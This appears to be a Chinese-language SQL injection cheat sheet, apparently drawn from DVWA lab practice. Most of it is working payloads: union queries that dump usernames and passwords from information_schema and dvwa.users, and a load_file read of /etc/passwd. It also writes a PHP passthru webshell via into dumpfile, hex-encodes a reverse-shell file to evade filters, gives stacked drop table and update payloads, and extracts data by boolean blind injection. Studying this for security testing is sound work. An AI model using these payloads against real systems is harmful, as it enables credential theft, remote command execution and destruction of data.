SQLi
五种检测方式
- 布尔型
and 1=1 --
和and 1=2 --
- 时间型
- 错误型 输入一个 ‘ 造成错误,对盲注无效
- 联合型 基于union的联合查询,适用于后台通过for输出结果,否则只有第一个结果
- 堆叠型 连接不同语句,可以用于增删该
基于报错的检测
输入' " % ( ) 查看是否出错
检测
基于布尔的报错
假设后台语句 select * from users where id = ___
输入 | 拼接得到语句 | |
---|---|---|
' and '1' = '1 或 1' and '1 | select * from users where id = ' ' and '1' = '1' | 不会影响结果 |
' and '1' = '2 或 1' and '0 | select * from users where id = ' ' and '1' = '2 ' | 报错 |
' or '1' = '1' 或 ' or '1 | select * from users where id = ' ' or '1' = '1' | 查询到所有数据 |
查询
可利用 burp 的爆破功能爆破
列数
' order by 2 --
// 判断是否大于等于两行,-- 后需要有一个空格
' and \(columnName\) is null -- | 猜列名,存在无反应,不存在报错 |
' and \(table\).column is null -- | 猜本表名,列名已知 |
' and \(db\).table.column is null -- | 猜本库名 |
' and (select cout(*) from \(table\))>0 -- | 猜本库其他表名,当table不存在报错 |
' and othertable.\(column\) is null -- | 猜其他表列名 |
' or user = 'admin' -- ' or user like %a% -- |
猜字段 |
' or user='admin' and password 'md5hashmd5hashmd5hashmd5hashmd5hash' -- | 猜账号对应密码 |
'; update users set user='user' where user='admin' -- | 写当前表 |
'; insert .........; -- | |
'; delete ........; -- '; drop table users; -- |
联合查询
' union select 1,2 -- | select * from users where id = '' union select 1,2 -- ' | 查询第一个第二个字段的名称。联合查询的数据列数要相同 |
' union select * from ___ | select * from users where id = '' union select * from ___ | |
' union all select database() | ||
' union select user(), 2 -- | select * from users where id='' union select user(), 2 |
mysql函数:
@@datadir
@@hostname
@@version
@@version_compile_os
char() 将ASCII转为字符,防止被服务器过滤
concat() 连接函数
concat_ws(char(32,58,32), user(), database(), version()) 将查询函数结果连接并按第一个字符串分隔
md5()
database()
user()
version()
mysql 表结构
information_schema 包含了数据库的元信息
' union select table_name,table_schema from information_schema.tables-- | 查表名与库名 |
' union select table_schema,count(*) from information_schema.tables group by table_schema -- | 查库及其包含的表个数 |
' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'-- | dvwa库下的表 |
' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users’-- | 查询dvwa库中表名与列名 |
' union select user,password from dvwa.users-- | |
' union select null, concat(user,0x3a,password) from users-- |
操作文件
load_file() 读文件 | ' union select null, load_file('/etc/passwd') -- | |
写文件 | ' union select null, "<?php passthru($_GET['cmd']) ?>" into dumpfile "cmd.php" -- | |
mysql账号权限不够大时无法访问information_schema | ' union select null, concat(user, 0x3a, password) from users into outfile '/tmp/db.txt' -- |
写入文件时mysql默认写入家目录下 /usr/lib/mysql/dvwa/cmd.php ;但执行php的apache用户无权限访问,且mysql也无法将木马写入/var/www目录下
可将木马写入/tmp/目录下,再通过文件包含漏洞执行
上传webshell文件 /usr/share/webshells/php/php-reverse-shell.php
编码为16进制可防止字符过滤。mysql的 into dumpfile 会将其转换为字符。使用 xxd 工具,再使用 tr 去除\n cat webshell.php | xxd -ps | tr -d '\n'。此webshell过大,无法用get方式上传
盲注
即数据库的错误信息不显示在页面。
- 布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。
- 时间盲注 界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。
Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
判断
/* 整型注入 */
sql-bool.php?name=user1 and 1=1
sql-bool.php?name=user1 and 1=2
/* 字符型注入 */
sql-bool.php?name=user1' and '1'='1
sql-bool.php?name=user1' and '1'='2
/* 字符型注入 */
sql-bool.php?name=user1" and "1"="1
sql-bool.php?name=user1" and "1"="2
根据payload返回的成功或失败可以判断是否存在注入点
读数据
由于盲注无法回显,所以只能通过将获取到的数据挨个字符截取,然后再通过转换为ASCII码的方式与可见字符的ASCII值一一对比
/* 判断库名长度 */
sql-bool.php?name=user1' and (select length(database())) = 1 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 2 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 3 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 4 and '1'='1
然后我们再一位一位的判断字符内容,由于mysql库名不区分大小写,且组成元素为26位英文字母、数字和下划线,所以只需要和这些字符的ASCII值进行比较
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 97 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 98 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 99 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 100 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 101 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 102 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 103 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 104 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 105 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 106 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 107 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 108 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 109 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 110 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 111 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 112 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 113 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 114 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 115 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 116 and '1'='1
当与其他ASCII值判断时,返回均为假,与116判断是否相等时,返回为真,由此可判断数据库名第一个字符的ASCII值为116,再通过ASCII转换为字符,可得知当前数据库名第一个字符内容为't'